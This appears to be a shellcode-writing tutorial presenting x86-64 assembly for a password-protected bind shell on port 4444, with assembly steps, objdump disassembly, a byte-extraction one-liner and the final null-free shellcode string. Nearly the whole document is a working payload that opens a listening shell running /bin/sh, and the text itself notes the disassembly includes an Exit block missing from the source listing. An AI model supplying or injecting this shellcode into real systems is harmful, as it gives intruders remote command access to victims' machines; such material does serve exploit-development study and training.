global _start section .text _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 41 xor rax, rax mov al, 41 xor rdi, rdi mov dil, 2 xor rsi, rsi mov sil, 1 xor rdx, rdx syscall ; copy socket descriptor to rdi for future use mov rdi, rax ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = INADDR_ANY ; bzero(&server.sin_zero, 8) xor rax, rax push rax mov dword [rsp-4], eax mov word [rsp-6], 0x5c11 ; port 4444 mov byte [rsp-8], 0x2 sub rsp, 8 ; bind(sock, (struct sockaddr *)&server, sockaddr_len) ; syscall number 49 xor rax, rax mov al, 49 mov rsi, rsp xor rdx, rdx mov al, 16 syscall ; listen(sock, MAX_CLIENTS) ; syscall number 50 xor rax, rax mov al, 50 xor rsi, rsi mov sil, 2 syscall ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) ; syscall number 43 xor rax, rax mov al, 43 sub rsp, 16 mov rsi, rsp push 16 mov rdx, rsp syscall mov r9, rax ; store the client socket description xor rax, rax ; close parent mov al, 3 syscall xchg rdi , r9 xor rsi , rsi ; duplicate sockets
dup2: push 0x21 pop rax syscall inc rsi cmp rsi , 0x2 loopne dup2 Checkpass: xor rax , rax push 0x10 pop rdx sub rsp , 16 ; 16 bytes to receive user input mov rsi , rsp xor edi , edi syscall ; read() mov rax , 0x64726f7773736150 ; "Password" lea rdi , [rel rsi] scasq jz Shell push 0x3c pop rax syscall Shell: xor rax, rax ; First NULL push push rax mov rbx, 0x68732f2f6e69622f ; push /bin//sh in reverse push rbx mov rdi, rsp ; store /bin//sh address in RDI push rax ; Second NULL push mov rdx, rsp ; set RDX push rdi ; Push address of /bin//sh mov rsi, rsp ; set RSI ; Call the Execve syscall add rax, 59 syscall
Assemble it with nasm:
nasm -f elf64 MyBindShell.nasm -o bindshell.o
Check the objdump output for null bytes:
objdump -d bindshell.o -M intel
bindshell.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 c0 xor rax,rax
3: b0 29 mov al,0x29
5: 48 31 ff xor rdi,rdi
8: 40 b7 02 mov dil,0x2
b: 48 31 f6 xor rsi,rsi
e: 40 b6 01 mov sil,0x1
11: 48 31 d2 xor rdx,rdx
14: 0f 05 syscall
16: 48 89 c7 mov rdi,rax
19: 48 31 c0 xor rax,rax
1c: 50 push rax
1d: 89 44 24 fc mov DWORD PTR [rsp-0x4],eax
21: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
28: c6 44 24 f8 02 mov BYTE PTR [rsp-0x8],0x2
2d: 48 83 ec 08 sub rsp,0x8
31: 48 31 c0 xor rax,rax
34: b0 31 mov al,0x31
36: 48 89 e6 mov rsi,rsp
39: 48 31 d2 xor rdx,rdx
3c: b0 10 mov al,0x10
3e: 0f 05 syscall
40: 48 31 c0 xor rax,rax
43: b0 32 mov al,0x32
45: 48 31 f6 xor rsi,rsi
48: 40 b6 02 mov sil,0x2
4b: 0f 05 syscall
4d: 48 31 c0 xor rax,rax
50: b0 2b mov al,0x2b
52: 48 83 ec 10 sub rsp,0x10
56: 48 89 e6 mov rsi,rsp
59: 6a 10 push 0x10
5b: 48 89 e2 mov rdx,rsp
5e: 0f 05 syscall
60: 49 89 c1 mov r9,rax
63: 48 31 c0 xor rax,rax
66: b0 03 mov al,0x3
68: 0f 05 syscall
6a: 49 87 f9 xchg r9,rdi
6d: 48 31 f6 xor rsi,rsi
0000000000000070 <dup2>:
70: 6a 21 push 0x21
72: 58 pop rax
73: 0f 05 syscall
75: 48 ff c6 inc rsi
78: 48 83 fe 02 cmp rsi,0x2
7c: e0 f2 loopne 70 <dup2>
000000000000007e <Checkpass>:
7e: 48 31 c0 xor rax,rax
81: 6a 10 push 0x10
83: 5a pop rdx
84: 48 83 ec 10 sub rsp,0x10
88: 48 89 e6 mov rsi,rsp
8b: 31 ff xor edi,edi
8d: 0f 05 syscall
8f: 48 b8 50 61 73 73 77 movabs rax,0x64726f7773736150
96: 6f 72 64
99: 48 8d 3e lea rdi,[rsi]
9c: 48 af scas rax,QWORD PTR es:[rdi]
9e: 74 05 je a5 <Shell>
a0: 6a 3c push 0x3c
a2: 58 pop rax
a3: 0f 05 syscall
00000000000000a5 <Shell>:
a5: 48 31 c0 xor rax,rax
a8: 50 push rax
a9: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
b0: 2f 73 68
b3: 53 push rbx
b4: 48 89 e7 mov rdi,rsp
b7: 50 push rax
b8: 48 89 e2 mov rdx,rsp
bb: 57 push rdi
bc: 48 89 e6 mov rsi,rsp
bf: 48 83 c0 3b add rax,0x3b
c3: 0f 05 syscall
00000000000000c5 <Exit>:
c5: 6a 3c push 0x3c
c7: 58 pop rax
c8: 48 31 ff xor rdi,rdi
cb: 0f 05 syscall
No null bytes. Next, extract the hex bytes from the objdump output. (Note that the disassembly above also shows an `<Exit>` block after `<Shell>` that does not appear in the source listing shown earlier, so the two do not correspond exactly.)
for i in $(objdump -d bindshell.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\xb0\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xc0\x6a\x10\x5a\x48\x83\xec\x10\x48\x89\xe6\x31\xff\x0f\x05\x48\xb8\x50\x61\x73\x73\x77\x6f\x72\x64\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05